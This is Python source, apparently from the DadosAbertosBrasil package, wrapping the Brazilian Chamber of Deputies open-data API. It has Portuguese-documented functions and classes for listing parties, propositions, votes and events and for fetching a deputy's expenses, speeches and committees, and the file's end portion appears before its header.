seus identificadores, tipos e descrições. É possível filtrar a lista por
identificadores, tipos de órgãos, sigla, situação do órgão ou período de
tempo em que os órgãos estiveram ativos, se aplicável.
Parâmetros
----------
sigla : str (default=None)
Sigla oficialmente usadas para designar o órgão da câmara.
tipo : int (default=None)
Código numérico do tipo de órgãos que se deseja buscar dados. Pode ser
obtido pela função `camara.referencias`.
inicio : str (default=None)
Data de início, no formato 'AAAA-MM-DD', de um intervalo de tempo no
qual os órgãos buscados devem ter estado em atividade.
fim : str (default=None)
Data de término, no formato 'AAAA-MM-DD', de um intervalo de tempo no
qual os órgãos buscados devem ter estado em atividade.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='id')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista das comissões e outros órgãos legislativos da Câmara.
--------------------------------------------------------------------------
'''
params = {}
if sigla is not None:
params['sigla'] = sigla
if tipo is not None:
params['codTipoOrgao'] = tipo
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
dados = _get(path='orgaos', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def lista_partidos(
legislatura: int = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'sigla',
index: bool = False
) -> _pd.DataFrame:
'''
Os partidos políticos que têm ou já tiveram parlamentares em exercício na
Câmara.
Retorna uma lista de dados básicos sobre os partidos políticos que têm ou
já tiveram deputados na Câmara. Se não forem passados parâmetros, a função
retorna os partidos que têm deputados em exercício no momento da
requisição. É possível obter uma lista de partidos representados na Câmara
em um certo intervalo de datas ou de legislaturas.
Parâmetros
----------
legislatura : int (default=None)
Número da legislatura a qual os dados buscados devem corresponder.
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='sigla')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de partidos políticos que têm ou já tiveram parlamentares em
exercício na Câmara.
--------------------------------------------------------------------------
'''
params = {}
if legislatura is not None:
params['idLegislatura'] = legislatura
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
dados = _get(path='partidos', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def lista_proposicoes(
tipo: str = None,
numero: int = None,
ano: int = None,
autor_cod: int = None,
autor_nome: str = None,
partido_sigla: str = None,
partido_cod: int = None,
autor_uf: str = None,
keyword: str = None,
tramitacao_senado: bool = None,
apresentacao_inicio: str = None,
apresentacao_fim: str = None,
situacao: int = None,
tema: int = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'id',
index: bool = False
) -> _pd.DataFrame:
'''
Lista de proposições na Câmara.
Lista de informações básicas sobre projetos de lei, resoluções, medidas
provisórias, emendas, pareceres e todos os outros tipos de proposições na
Câmara. Por padrão, são retornadas todas as proposições que foram
apresentadas ou tiveram alguma mudança de situação nos últimos 30 dias.
Esse intervalo de tramitação pode ser configurado pelos parâmetros
`inicio` e `fim`.
Se for(em) passado(s) um ou mais dos parâmetros `id`, `ano`,
`apresentacao_inicio`, `apresentacao_fim`, `autor_cod`, `autor_nome`,
o intervalo de tramitação só será levado em consideração se os parâmetros
`inico` e/ou `fim` estiverem explicitamente configurados. Se não
estiverem, poderão ser listadas proposições que não tiveram tramitação
recente (e a resposta pode demorar bastante).
Parâmetros
----------
tipo : str (default=None)
Sigla do tipo das proposições que se deseja obter. A lista de tipos e
siglas existentes pode ser obtida pela função `camara.referencias`.
numero : int (default=None)
Número oficialmente atribuídos às proposições segundo o art. 137 do
Regimento Interno, como “PL 1234/2016”
ano : int (default=None)
Ano de apresentação das proposições que serão listadas no formato
'AAAA'.
autor_cod : int (default=None)
Código numérico identificador do deputado autor das proposições que
serão listadas.
autor_nome : str (default=None)
Nome ou parte do nome do(s) autor(es) das proposições que se deseja
obter. Deve estar entre aspas.
partido_sigla : str (default=None)
Sigla do partido a que pertençam os autores das proposições a serem
listadas.
partido_cod : int (default=None)
Identificador numérico do partido a que pertençam os autores das
proposições que serão listadas. Esses identificadores podem ser
obtidos pela função `camara.lista_partidos` e são mais precisos do
que as siglas, que podem ser usadas por partidos diferentes em épocas
diferentes.
autor_uf : str (default=None)
Sigla da unidade da federação (estados e Distrito Federal) pela qual
o(s) autor(es) das proposições selecionadas tenha(m) sido eleito(s).
keyword : str (default=None)
Palavra-chave sobre o tema a que a proposição se relaciona.
tramitacao_senado : bool (default=None)
Buscar proposições que já tenha tramitado no Senado.
inicio : str (default=None)
Data do início do intervalo de tempo em que tenha havido tramitação
das proposições a serem listadas, no formato 'AAAA-MM-DD'. Se omitido,
é assumido como a data de 30 dias anteriores à proposição.
fim : str (default=None)
Data do fim do intervalo de tempo em que tenha havido tramitação das
proposições a serem listadas. Se omitido, é considerado ser o dia em
que é feita a requisição.
apresentacao_inicio : str (default=None)
Data do início do intervalo de tempo em que tenham sido apresentadas
as proposições a serem listadas, no formato 'AAAA-MM-DD'.
apresentacao_fim : str (default=None)
Data do fim do intervalo de tempo em que tenham sido apresentadas as
proposições a serem listadas.
situacao : int (default=None)
Código numérico do tipo de situação em que se encontram as proposições
que serão listadas. As situações possíveis podem ser obtidas pela
função `camara.referencias`. Atenção: este parâmetro pode apresentar
resultados inesperados, por problemas com o registro dos dados.
tema : int (default=None)
Código numérico das áreas temáticas das proposições que serão
listadas. Os temas possíveis podem ser obtidos pela função
`camara.referencias`.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='id')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de proposições na Câmara.
--------------------------------------------------------------------------
'''
params = {}
if tipo is not None:
params['siglaTipo'] = tipo
if numero is not None:
params['numero'] = numero
if ano is not None:
params['ano'] = ano
if autor_cod is not None:
params['idDeputadoAutor'] = autor_cod
if autor_nome is not None:
params['autor'] = autor_nome
if partido_sigla is not None:
params['siglaPartidoAutor'] = partido_sigla
if partido_cod is not None:
params['idPartidoAutor'] = partido_cod
if autor_uf is not None:
params['siglaUfAutor'] = parse.uf(autor_uf)
if keyword is not None:
params['keywords'] = keyword
if tramitacao_senado is not None:
params['tramitacaoSenado'] = 'true' if tramitacao_senado else 'false'
if apresentacao_inicio is not None:
params['dataApresentacaoInicio'] = apresentacao_inicio
if apresentacao_fim is not None:
params['dataApresentacaoFim'] = apresentacao_fim
if situacao is not None:
params['codSituacao'] = situacao
if tema is not None:
params['codTema'] = tema
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
dados = _get(path='proposicoes', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def lista_votacoes(
proposicao: int = None,
evento: int = None,
orgao: int = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = False,
ordenar_por: str = 'dataHoraRegistro',
index: bool = False
) -> _pd.DataFrame:
'''
Lista de votações na Câmara.
Retorna uma lista de informações básicas sobre as votações ocorridas em
eventos dos diversos órgãos da Câmara. Se não forem passados parâmetros
que delimitem o intervalo de tempo da pesquisa, são retornados dados sobre
todas as votações ocorridas nos últimos 30 dias, em eventos de todos os
órgãos.
Os parâmetros de data permitem estender o período, mas por enquanto é
necessário que as duas datas sejam de um mesmo ano. Quando apenas uma
delas está presente, são retornadas somente as votações ocorridas no mesmo
ano, antes de `fim` ou após `inicio`.
Parâmetros
----------
proposicao : int (default=None)
Código numérico da proposição, que podem ser obtidos pela função
`camara.lista_proposições`. Se presente, listará as votações que
tiveram a proposição como objeto de votação ou que afetaram as
proposições listadas.
evento : int (default=None)
Código numérico do evento realizado na Câmara, no qual tenham sido
realizadas as votações a serem listadas. Os códigos podem ser obtidos
pela função `camara.lista_eventos`. Somente os eventos deliberativos
podem ter votações. Os eventos podem ter ocorrido fora do intervalo de
tempo padrão ou definido por `inicio` e/ou `fim`.
orgao : int (default=None)
Código numérico do órgão da Câmara. Se presente, serão retornadas
somente votações do órgão enumerado. Os códigos existentes podem ser
obtidos pela função `camara.lista_orgaos`.
inicio : str (default=None)
Data em formato 'AAAA-MM-DD' para início do intervalo de tempo no qual
tenham sido realizadas as votações a serem listadas. Se usado sozinho,
esse parâmetro faz com que sejam retornadas votações ocorridas dessa
data até o fim do mesmo ano. Se usado com `fim`, as duas datas devem
ser de um mesmo ano.
fim : str (default=None)
Data em formato 'AAAA-MM-DD' que define o fim do intervalo de tempo no
qual tenham sido realizadas as votações a serem listadas. Se usado
sozinho, esse parâmetro faz com que sejam retornadas todas as votações
ocorridas desde 1º de janeiro do mesmo ano até esta data. Se usado com
`inicio`, é preciso que as duas datas sejam de um mesmo ano.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=False)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataHoraRegistro')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de votações na Câmara.
--------------------------------------------------------------------------
'''
params = {}
if proposicao is not None:
params['idProposicao'] = proposicao
if evento is not None:
params['idEvento'] = evento
if orgao is not None:
params['idOrgao'] = orgao
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
dados = _get(path='votacoes', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def referencias(
lista: str,
index: bool = False
) -> _pd.DataFrame:
'''
Listas de valores válidos para as funções deste módulo.
Parâmetros
----------
lista : str
Referências que serão listadas. Deve ser uma destas opções:
- 'autores'
- 'temas'
- 'eventos'
- 'orgaos'
- 'proposicoes'
- 'tramitacoes'
- 'ufs'
- 'situacoes_deputados'
- 'situacoes_eventos'
- 'situacoes_orgaos'
- 'situacoes_proposicoes'
index : bool (default=False)
Se True, define a coluna `cod` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista das referências válidas.
'''
referencia = {
'autores': 'proposicoes/codTipoAutor',
'temas': 'proposicoes/codTema',
'eventos': 'tiposEvento',
'orgaos': 'tiposOrgao',
'proposicoes': 'tiposProposicao',
'tramitacoes': 'tiposTramitacao',
'ufs': 'uf',
'situacoes_deputados': 'situacoesDeputado',
'situacoes_eventos': 'situacoesEvento',
'situacoes_orgaos': 'situacoesOrgao',
'situacoes_proposicoes': 'situacoesProposicao'
}
if lista in referencia.keys():
data = _get(f'referencias/{referencia[lista]}')
else:
raise TypeError('Referência inválida. Insira um dos seguintes valores para `lista`: ' \
+ ', '.join(list(referencia.keys())))
df = _pd.DataFrame(data['dados'])
if index:
df.set_index('cod', inplace=True)
return df | '''
Módulo para captura dos dados abertos da Câmara dos Deputados do Brasil.
Mini-Tutorial
-------------
1. Importe o módulo `camara`.
>>> from DadosAbertosBrasil import camara
2. Busque o código do objeto de estudo utilizando as funções `lista`.
>>> camara.lista_deputados( ... )
3. Instancie o objeto de estudo utilizando o código encontrado.
>>> dep = camara.Deputado(cod)
4. Utilize os atributos da classe para obter informações básicas do objeto.
>>> dep.dados
5. Utilize os métodos da classe para obter informações detalhadas do objeto.
>>> dep.despesas( ... )
Documentação da API original
----------------------------
https://dadosabertos.camara.leg.br/swagger/api.html
'''
import pandas as _pd
from ._utils import parse
from ._utils.get_data import get_data
def _get(
path: str,
params: dict = None
) -> dict:
return get_data(
endpoint = 'https://dadosabertos.camara.leg.br/api/v2/',
path = path,
params = params
)
def _df(
dados: dict,
index_col: str = None
) -> _pd.DataFrame:
'''
Converte dados brutos da API em um DataFrame.
Parâmetros
----------
dados : dict
Dados brutos da API.
index_col : str (default=None)
Nome da coluna que será usada como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Dados convertidos em DataFrame.
'''
df = _pd.DataFrame(dados['dados'])
if (index_col is not None) and (not df.empty):
df.set_index(index_col, inplace=True)
return df
class Bloco:
'''
Informações sobre um bloco partidário específico.
Parâmetros
----------
cod: int
Código numérico do bloco partidário do qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código numérico do bloco partidário.
legislatura : str
Legislatura do bloco partidário.
nome : str
Nome do bloco partidário.
uri : str
Endereço para coleta de dados direta pela API do bloco partidário.
Exemplos
--------
Obter o nome do bloco #576.
>>> bl = camara.Bloco(cod=576)
>>> bl.nome
... 'PSL, PTB'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['blocos', str(cod)])['dados']
self.legislatura = self.dados['idLegislatura']
self.nome = self.dados['nome']
self.uri = self.dados['uri']
def __repr__(self):
return f"DadosAbertosBrasil.camara: Bloco {self.nome}"
class Deputado:
'''
Retorna os dados cadastrais de um parlamentar que, em algum momento
da história e por qualquer período, entrou em exercício na Câmara.
Parâmetros
----------
cod : int
Código do parlamentar.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código de identificação.
condicao_eleitoral : str
Condição eleitoral.
cpf : str
Número do CPF.
descricao_status : str
Descrição do último status.
email : str
E-mail.
escolaridade : str
Escolaridade.
falecimento : str
Data de falecimento no formato 'AAAA-MM-DD'.
Retorna vazio caso o parlamentar não tenha falecido.
foto : str
URL da foto.
gabinete : dict
Informações de identificação e contato do gabinete.
legislatura : int
ID da legislatura mais recente.
municipio_nascimento : str
Município de nascimento.
nascimento : str
Data de nascimento no formato 'AAAA-MM-DD'.
nome : str
Nome mais comum.
nome_completo : str
Nome civil completo.
nome_eleitoral : str
Nome utilizado na campanha eleitoral.
partido : str
Último partido.
rede_social : list
Lista de nomes em redes sociais.
sexo : str
- 'M': Masculino;
- 'F': Feminino.
situacao : str
Situação do último status.
uf : str
Sigla da Unidade Federativa pela qual foi eleito.
uf_nascimento : str
Unidade Federativa de nascimento.
ultima_atualizacao : str
Dia e horário da última atualização de status.
uri : str
Endereço para coleta de dados direta pela API.
website : str
Website.
Exemplos
--------
Coletar partido mais recente do deputado Rodrigo Maia.
>>> cod = 74693 # Código do deputado
>>> dep = camara.Deputado(cod=cod)
>>> dep.partido
... 'DEM'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['deputados', str(cod)])['dados']
self.condicao_eleitoral = self.dados['ultimoStatus']['condicaoEleitoral']
self.cpf = self.dados['cpf']
self.descricao_status = self.dados['ultimoStatus']['descricaoStatus']
self.email = self.dados['ultimoStatus']['email']
self.escolaridade = self.dados['escolaridade']
self.falecimento = self.dados['dataFalecimento']
self.foto = self.dados['ultimoStatus']['urlFoto']
self.gabinete = self.dados['ultimoStatus']['gabinete']
self.legislatura = self.dados['ultimoStatus']['idLegislatura']
self.municipio_nascimento = self.dados['municipioNascimento']
self.nascimento = self.dados['dataNascimento']
self.nome = self.dados['ultimoStatus']['nome']
self.nome_completo = self.dados['nomeCivil']
self.nome_eleitoral = self.dados['ultimoStatus']['nomeEleitoral']
self.partido = self.dados['ultimoStatus']['siglaPartido']
self.rede_social = self.dados['redeSocial']
self.sexo = self.dados['sexo']
self.situacao = self.dados['ultimoStatus']['situacao']
self.uf = self.dados['ultimoStatus']['siglaUf']
self.uf_nascimento = self.dados['ufNascimento']
self.ultima_atualizacao = self.dados['ultimoStatus']['data']
self.uri = self.dados['uri']
self.website = self.dados['urlWebsite']
def __repr__(self):
return f"DadosAbertosBrasil.camara: Deputad{'a' if self.sexo == 'F' else 'o'} {self.nome_eleitoral}"
def despesas(
self,
legislatura: int = None,
ano: int = None,
mes: int = None,
fornecedor: int = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'ano'
) -> _pd.DataFrame:
'''
As despesas com exercício parlamentar do deputado.
Dá acesso aos registros de pagamentos e reembolsos feitos pela Câmara
em prol do deputado, a título da Cota para Exercício da Atividade
Parlamentar, a chamada "cota parlamentar".
Se não forem passados os parâmetros de tempo, o serviço retorna os
dados dos seis meses anteriores à requisição.
Parâmetros
----------
legislatura : int (default=None)
ID da legislatura em que tenham ocorrido as despesas.
ano : int (default=None)
Ano de ocorrência das despesas.
mes : int (default=None)
Número do mês de ocorrência das despesas.
fornecedor : int (default=None)
CNPJ de uma pessoa jurídica, ou CPF de uma pessoa física,
fornecedora do produto ou serviço (apenas números).
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com
esta requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='ano')
Nome do campo pelo qual a lista deverá ser ordenada:
qualquer um dos campos do retorno, e também idLegislatura.
Retorna
-------
pandas.core.frame.DataFrame
Lista de despesas com exercício parlamentar do deputado.
----------------------------------------------------------------------
'''
params = {}
if legislatura is not None:
params['idLegislatura'] = legislatura
if ano is not None:
params['ano'] = ano
if mes is not None:
params['mes'] = mes
if fornecedor is not None:
params['cnpjCpfFornecedor'] = fornecedor
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
path = ['deputados', str(self.cod), 'despesas']
dados = _get(path=path, params=params)
return _df(dados)
def discursos(
self,
legislatura: int = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'dataHoraInicio'
) -> _pd.DataFrame:
'''
Os discursos feitos por um deputado em eventos diversos.
Retorna uma lista de informações sobre os pronunciamentos feitos
pelo deputado que tenham sido registrados, em quaisquer eventos,
nos sistemas da Câmara.
Caso os parâmetros de tempo não sejam configurados na requisição,
são buscados os discursos ocorridos nos sete dias anteriores ao
da requisição.
Parâmetros
----------
legislatura : int (default=None)
Número da legislatura a qual os dados buscados devem corresponder.
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataHoraInicio')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
Retorna
-------
pandas.core.frame.DataFrame
Lista de discursos feitos por um deputado em eventos diversos.
----------------------------------------------------------------------
'''
params = {}
if legislatura is not None:
params['idLegislatura'] = legislatura
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
path = ['deputados', str(self.cod), 'discursos']
dados = _get(path=path, params=params)
return _df(dados)
def eventos(
self,
legislatura: int = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'dataHoraInicio',
index: bool = False
) -> _pd.DataFrame:
'''
Uma lista de eventos com a participação do parlamentar.
Retorna uma lista de objetos evento nos quais a participação do
parlamentar era ou é prevista.
Se não forem passados parâmetros de tempo, são retornados os eventos
num período de cinco dias, sendo dois antes e dois depois do dia da
requisição.
Parâmetros
----------
legislatura : int (default=None)
Número da legislatura a qual os dados buscados devem corresponder.
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataHoraInicio')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de discursos feitos por um deputado em eventos diversos.
----------------------------------------------------------------------
'''
params = {}
if legislatura is not None:
params['idLegislatura'] = legislatura
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
path = ['deputados', str(self.cod), 'eventos']
dados = _get(path=path, params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def frentes(
self,
index: bool = False
) -> _pd.DataFrame:
'''
As frentes parlamentares das quais um deputado é integrante.
Retorna uma lista de informações básicas sobre as frentes
parlamentares das quais o parlamentar seja membro, ou, no caso de
frentes existentes em legislaturas anteriores, tenha encerrado a
legislatura como integrante.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de frentes parlamentares das quais um deputado é integrante.
----------------------------------------------------------------------
'''
path = ['deputados', str(self.cod), 'frentes']
dados = _get(path=path, params=None)
index_col = 'id' if index else None
return _df(dados, index_col)
def orgaos(
self,
legislatura: int = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'dataInicio',
index: bool = False
) -> _pd.DataFrame:
'''
Os órgãos dos quais um deputado é integrante.
Retorna uma lista de órgãos, como as comissões e procuradorias,
dos quais o deputado participa ou participou durante um intervalo
de tempo.
Cada item identifica um órgão, o cargo ocupado pelo parlamentar neste
órgão (como presidente, vice-presidente, titular ou suplente) e as
datas de início e fim da ocupação deste cargo.
Se não for passado algum parâmetro de tempo, são retornados os órgãos
ocupados pelo parlamentar no momento da requisição. Neste caso a
lista será vazia se o deputado não estiver em exercício.
Parâmetros
----------
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataInicio')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `idOrgao` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista dos órgãos dos quais um deputado é integrante.
----------------------------------------------------------------------
'''
params = {}
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
path = ['deputados', str(self.cod), 'orgaos']
dados = _get(path=path, params=params)
index_col = 'idOrgao' if index else None
return _df(dados, index_col)
class Evento:
'''
Retorna um conjunto detalhado de informações sobre o evento da Câmara.
Parâmetros
----------
cod : int
Código numérico do evento do qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código numérico do evento.
andar : str
Andar do prédio onde ocorreu o evento.
descricao : str
Descrição do evento.
descricao_tipo : str
Tipo do evento.
fases : str
Fases do evento.
fim : str
Data e horário que o evento foi finalizado no formato 'AAAA-MM-DD'.
inicio : str
Data e horário que o evento foi iniciado no formato 'AAAA-MM-DD'.
local : str
Local onde ocorreu o evento.
local_externo : str
Local externo do evento.
lista_orgaos : list of dict
Lista de orgãos e informações sobre os mesmos.
predio : str
Prédio que ocorreu o evento.
requerimentos : list of dict
Requerimentos do evento.
sala : str
Sala do prédio onde ocorreu o evento.
situacao : str
Situação do evento.
uri : str
Endereço para coleta de dados direta pela API do evento.
uri_convidados : str
Endereço para coleta de dados direta pela API dos convidados.
uri_deputados : str
Endereço para coleta de dados direta pela API dos deputados.
url_documento_pauta : str
Endereço URL para visualizar a pauta do evento.
url_registro : str
Endereço URL onde o evento foi registrado.
Exemplos
--------
Obter a URL para assistir ao evento #59265.
>>> ev = camara.Evento(cod=59265)
>>> ev.url_registro
... 'https://www.youtube.com/watch?v=8D2gjMrTnMA'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['eventos', str(cod)])['dados']
self.andar = self.dados['localCamara']['andar']
self.descricao = self.dados['descricao']
self.descricao_tipo = self.dados['descricaoTipo']
self.fases = self.dados['fases']
self.fim = self.dados['dataHoraFim']
self.inicio = self.dados['dataHoraInicio']
self.local = self.dados['localCamara']['nome']
self.local_externo = self.dados['localExterno']
self.lista_orgaos = self.dados['orgaos']
self.predio = self.dados['localCamara']['predio']
self.requerimentos = self.dados['requerimentos']
self.sala = self.dados['localCamara']['sala']
self.situacao = self.dados['situacao']
self.uri = self.dados['uri']
self.uri_convidados = self.dados['uriConvidados']
self.uri_deputados = self.dados['uriDeputados']
self.url_documento_pauta = self.dados['urlDocumentoPauta']
self.url_registro = self.dados['urlRegistro']
def __repr__(self):
return f"DadosAbertosBrasil.camara: Evento {self.descricao}"
def deputados(
self,
index: bool = False
) -> _pd.DataFrame:
'''
Os deputados participantes de um evento específico.
Retorna uma lista de dados resumidos sobre deputados participantes do
evento. Se o evento já ocorreu, a lista identifica os deputados que
efetivamente registraram presença no evento. Se o evento ainda não
ocorreu, a lista mostra os deputados que devem participar do evento,
por serem convidados ou por serem membros do(s) órgão(s) responsável
pelo evento.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista dos deputados participantes de um evento específico.
----------------------------------------------------------------------
'''
path = ['eventos', str(self.cod), 'deputados']
dados = _get(path=path, params=None)
index_col = 'id' if index else None
return _df(dados, index_col)
def orgaos(
self,
index: bool = False
) -> _pd.DataFrame:
'''
Lista de órgãos organizadores do evento.
Retorna uma lista em que cada item é um conjunto mínimo de dados sobre
o(s) órgão(s) responsável(is) pelo evento.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de órgãos organizadores do evento.
----------------------------------------------------------------------
'''
path = ['eventos', str(self.cod), 'orgaos']
dados = _get(path=path, params=None)
index_col = 'id' if index else None
return _df(dados, index_col)
def pauta(
self,
index: bool = False
) -> _pd.DataFrame:
'''
Lista de proposições que foram ou deverão ser avaliadas em um evento
de caráter deliberativo.
Se o evento for de caráter deliberativo (uma reunião ordinária,
por exemplo) este serviço retorna a lista de proposições previstas
para avaliação pelos parlamentares. Cada item identifica, se as
informações estiverem disponíveis, a proposição avaliada, o regime
de preferência para avaliação, o relator e seu parecer, o resultado
da apreciação e a votação realizada.
Parâmetros
